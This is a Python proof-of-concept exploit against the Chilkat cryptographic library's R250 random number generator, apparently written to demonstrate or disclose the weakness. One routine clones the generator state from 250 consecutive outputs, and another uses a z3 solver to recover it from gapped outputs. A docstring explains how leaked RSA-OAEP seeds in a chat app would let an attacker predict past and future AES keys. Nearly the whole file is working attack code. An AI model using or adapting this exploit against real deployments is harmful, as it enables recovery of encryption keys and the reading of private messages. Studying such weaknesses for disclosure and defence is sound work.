#!/usr/bin/env python3

import secrets
import sys
from copy import deepcopy
from pathlib import Path
from time import time

import chilkat2
from z3 import *

glob = chilkat2.Global()
success = glob.UnlockBundle("Anything for 30-day trial")
if success is not True:
    print(glob.LastErrorText)
    sys.exit()


def rand(state, i):
    if i >= 147:
        j = i - 147
    else:
        j = i + 103

    state[i] ^= state[j]
    r = state[i]

    if i >= 249:
        i = 0
    else:
        i += 1

    return state, i, r


def z3_recover_state(outputs):
    start_time = time()
    solver = Solver()
    STATES = []
    # we want at least five state tables
    states_needed = max(math.floor(len(outputs) / 250), 200)
    for i in range(states_needed * 250):
        STATES.append(BitVec(f"R250[{i}]", 32))

    s_add_time = time()
    # add the relationships between the states
    for i in range(len(STATES) - 250):
        solver.add(STATES[i] ^ STATES[i + 103] == STATES[i + 250])
    j = 0
    # add the received outputs
    for i in range(len(outputs) * 2):
        if j >= len(outputs):
            break
        if i % 10 < 5:
            solver.add(STATES[i + 1499] == outputs[j])
            j += 1

    print("Time to add RNG output to the solver:", time() - s_add_time)

    result = solver.check()
    if result == sat:
        print("Time until the solver recovered the values:", time() - start_time)
        model = solver.model()
        state_table = {str(j): model[j].as_long() for j in model.decls()}
        state = [state_table[f"R250[{j}]"] for j in range(states_needed * 250)]
        return state[1499 : 1499 + len(outputs) * 2]
    else:
        print("unsat")
        exit()


def reconstruct_state_consecutive():
    print("PoC 1: Recovering state from 250 consecutive outputs")
    crypt = chilkat2.Crypt2()
    crypt.EncodingMode = "hex"
    rng_outputs = [
        int.from_bytes(bytearray.fromhex(crypt.GenRandomBytesENC(4)), byteorder="big")
        for _ in range(250)
    ]
    state = rng_outputs

    num_states_to_test = 10000
    print(
        f"Comparing {num_states_to_test} random values generated from recovered state "
        "to those generated by the Chilkat RNG..."
    )
    j = 0
    for _ in range(num_states_to_test):
        state, j, r = rand(state, j)
        assert r == int.from_bytes(
            bytearray.fromhex(crypt.GenRandomBytesENC(4)), byteorder="big"
        )
    print(
        "All tested values were equal: State cloning from 250 consecutive outputs was "
        "successful.\n\n"
    )


def reconstruct_state_gaps():
    """
    This simulates a scenario where the attacker only observes a subset of the
    RNG outputs. Chilkat internally uses the R250 RNG to generate the 20 byte
    (= 5 * sizeof(uint32_t)) seed used in OAEP. Given a scenario where RSA
    encryption from chilkat is used in a chat app as follows:

    1. Messages are AES-CBC encrypted with a long-term, static AES key that is
       generated once on chat creation with genRandomBytesENC() and random IV
       that is generated anew for each message using a non-chilkat RNG.
    2. The tuple (AES key, IV) is encrypted twice with EncryptStringENC (which
       uses RSA-OAEP internally): Once for the recipient's public key and again
       for the sender's public key.

    Ignoring that the use of a static AES key is bad in either case, it
    actually results in less new RNG output being sent per message. As such,
    the attacker only receives 20 bytes of RNG output per message in form of
    the OAEP seed.

    However, even this more difficult scenario does not prevent the attacker
    from recovering the internal state of the chilkat R250 RNG. Once the state
    is recovered, the attacker can predict all past and future outputs of the
    RNG and with that all long-term static AES keys that were or will be
    generated while the program is running. Additionally, the seed values for
    messages in chats that the attacker could not recover the AES key for can
    be recovered.
    """
    crypt = chilkat2.Crypt2()
    crypt.EncodingMode = "hex"
    num_outputs = 750
    print(
        f"PoC 2: Recovering state from {num_outputs} outputs, of which 5 are received, "
        "5 missed, 5 received, 5 missed, etc."
    )
    rng_outputs = [
        int.from_bytes(bytearray.fromhex(crypt.GenRandomBytesENC(4)), byteorder="big")
        for _ in range(num_outputs)
    ]
    # get 5, miss 5, get 5, miss 5, etc.
    state_with_gaps = [rng_outputs[i] for i in range(len(rng_outputs)) if i % 10 < 5]
    print("Adding RNG output to the solver...")
    recovered_state = z3_recover_state(state_with_gaps)
    print("Comparing recovered state against the actual RNG output...")
    assert recovered_state[:num_outputs] == rng_outputs[:num_outputs]
    print("State cloning from outputs with gaps was successful.")
    # reconstruct_state_consecutive() shows that if 250 consecutive outputs are
    # known, any future RNG output can be calculated.


if __name__ == "__main__":
    reconstruct_state_consecutive()
    reconstruct_state_gaps()
